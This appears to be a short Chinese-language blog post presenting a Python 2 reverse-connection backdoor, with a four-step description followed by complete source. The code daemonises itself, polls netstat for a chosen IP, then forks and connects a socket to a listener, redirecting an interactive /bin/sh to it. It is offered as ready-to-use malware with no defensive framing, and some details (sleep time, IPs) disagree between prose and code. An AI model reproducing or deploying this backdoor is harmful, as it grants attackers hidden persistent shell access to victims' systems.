python 反向连接后门

1)首先 daemon 化。
2)然后用 netstat 命令检测指定的 IP(192.168.1.111)是否已连接上:有,则激活;无,则睡眠几分钟(这个时间可根据需要自行调节)。
3)激活后,开一个子进程,创建 socket,与运行了监听程序的 IP 进行连接,并执行一个 shell,将该 shell 的输入输出重定向到 socket。
4)父进程则等待 shell 子进程执行,执行完毕后继续检测,周而复始……
#!/usr/bin/python   import os  import sys  import socket  import time   def daemon ():      try:          pid = os.fork()          if pid > 0:              sys.exit(0)      except OSError, e:          print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)          sys.exit(1)       os.chdir("/")      os.setsid()      os.umask(0)        try:          pid = os.fork()          if pid > 0:              print "Daemon PID %d" % pid              sys.exit(0)      except OSError, e:          print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)          sys.exit(1)    def shell (host = '10.0.0.111', port = 1711):      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)      try:          s.connect((host, port))          f = s.fileno()          os.dup2(f, 0)          os.dup2(f, 1)          os.dup2(f, 2)          os.execl("/bin/sh", "sh", "-i")       except socket.error, (errno, errstr):          print "connect error%d\n" % os.getpid()          time.sleep(10)       sys.exit(127)   if __name__ == "__main__":      daemon()       while(True):          (cin, cout) = os.popen4("netstat -nt | grep 192.168.1.111")          str = cout.read()      try:          os.wait()      except OSError, e:          pass          if  str != '':              print str              try:                  pid = os.fork()                  if pid > 0:                      print 'parent wait:%d\n' % os.getpid()                      try:                          os.wait()                      except OSError, e:                          pass                 else:                      print 'ready to connect:%d\n' % os.getpid()                      shell()               except OSError, e:                  sys.exit(1)          else:              print "start sleep 5 mins:%d\n" % os.getpid()              time.sleep(10)